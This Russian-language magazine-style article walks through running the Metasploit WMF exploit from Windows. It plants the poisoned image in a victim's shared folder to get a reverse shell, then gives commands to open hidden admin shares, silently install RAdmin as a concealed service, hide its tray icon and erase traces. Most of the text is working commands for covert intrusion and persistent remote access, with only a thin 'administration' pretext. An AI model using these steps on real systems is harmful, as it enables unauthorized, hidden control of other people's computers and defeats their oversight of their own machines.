Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к практически любому компьютеру использующему системную библиотеку для обработки WMF-файлов? Наверное мало кто, особенно после разгромной статьи в февральском номере журнала. Однако, многие Win-пользователи, читающие журнал ][, не смогли его использовать по следующим причинам:

1. Отсутствие доступа к никсовому шеллу на удалённом компьютере;
2. Слабое знание других систем: FreeBSD, LINUX;

Возникает вопрос: зачем ломать WIN–компьютеры с никсовых шеллов? Почему бы не протестировать эксплоит в родной среде, спросите вы? Не будем разбирать экзотические варианты, типа работы под Virtual PC или WMWARE альтернативных систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё проще, запустим перловый эксплоит в Windows.

Всё протестировано на двух Windows XP SP2 в локальной сети и работает.

На диске ][ лежал пакет Metasploit Fгаmеwork - но он для никсов! Хотя и в его составе есть сплоит ie_xp_pfv_metafile.pm. На практике, при запуске в Active perl for Win32, он не работает, точнее не работает весь пакет Metasploit Fгаmеwork 2.5. Идём по ссылке www.metasploit.com/projects/Framework/downloads.html и скачиваем - “Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем ls exploits и с сожалением обнаруживаем, что ie_xp_pfv_metafile.pm там нет! Вот облом... Где взять? Ответ прост: на DVD ][ или скачать Metasploit ifгаmеwork 2.5 для никсов – в этом пакете он присутствует! То есть достаточно его перекопировать в папку exploits и пользоваться на здоровье. Вот так, для Win-пользователей всё упрощается.

Что делать дальше, когда вы получили шелл-доступ с правами системы к удалённому компьютеру с Windows, зависит от вашей фантазии. Для примера расскажу, что можно сделать в локальной сети для пользы (точнее для упрощённого администрирования WIN-систем администратором).

1. Удалённая скрытая установка RAdmin

Не всегда есть доступ к компьютеру пользователя (компьютер занят пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на его компьютер RA удалённо, по локальной сети. Как правило (у нас в локалке, например) каждый юзверь имеет расшаренную папку, разрешённую для записи и в основном пользуется стандартным проводником (никуда от него не деться – стандартная оболочка, используется в любой программе – файл\открыть файл\сохранить).

Запускаем консоль MSFConsole и дальше:

msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для win32
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх – устанавливаем IP куда будет коннектится реверс-шелл
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит
[*] Starting Reverse Handler.
[*] Waiting for connections to ххх.ххх.ххх.ххх:8080/ - поднимается Web-сервер на ранее указанном адресе и ждёт подключений.

Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя (ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.

Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа «M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff». Остаётся скопировать этот файл в папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.

Дождались соединения, юзверь в этот момент ничего не заметит (если не посмотрит в процессы и не увидит там cmd.exe).

Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll, а так же reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ, вот его содержание:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00

Примечание:

Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v. 3.2 со следующими параметрами:

Path=.\%SystemRoot%\system32\
SavePath
Silent=1
Overwrite=2

Можете задать другие, но на мой взгляд это оптимальные. Далее в консоли (уже в консоли cmd) пишем:

cd \ `перейти в корень диска
cd %SystemRoot%\system32 `задаём текущую папку system32
net share C$$=C: `расшариваем диск C: юзверя – он невидим в сетевом окружении
net share D$$=D: `расшариваем диск D: тоже (не знаем где система стоит, может и на D:)
copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `копируем архив RA в системную папку юзверя
cmd /c ra.exe `распаковываем всё необходимое для установки r_server и запуска его в скрытом режиме
r_server /install /silence `инсталлируем r_server.exe в скрытом режиме как службу
reg import Hide_RA.reg `скрываем иконку r_server.exe в трее
r_server /start /silence `запускаем скрытно службу r_server.exe
`Всё, r_server.exe ждёт подключений клиента…
delete ra.exe `удаляем архив
net share C$$ /delete `удаляем шары
net share D$$ /delete
exit `выходим из консоли cmd

Можно включить в архив run.cmd файл вида:

r_server /silence /install
reg import Hide_RA.reg
r_server /silence /start
delete ra.exe
net share C$$ /delete
net share D$$ /delete
exit

Тогда после «cmd /c ra.exe» в консоли надо запустить на исполнение его, например так:

cmd /c run.cmd `инсталлируем и запускаем службу r_server, затем убираем следы
exit `выходим из консоли cmd (шелла удалённого компьютера) в консоль MFS

msf ie_xp_pfv_metafile(win32_reverse) > exploit `и так далее остальных юзверей…

2. Удалённое превращение Windows_XP_SP2 в сервер win-терминалов.

Компьютер с сервером терминалов позволяет подключится к нему по типу удалённого рабочего стола, только без выхода из системы основного пользователя, а в отдельном сеансе, т. е. позволит работать за компьютеров как минимум двум пользователям одновременно, одному из них удалённо.

Работы ведутся. Продолжение следует?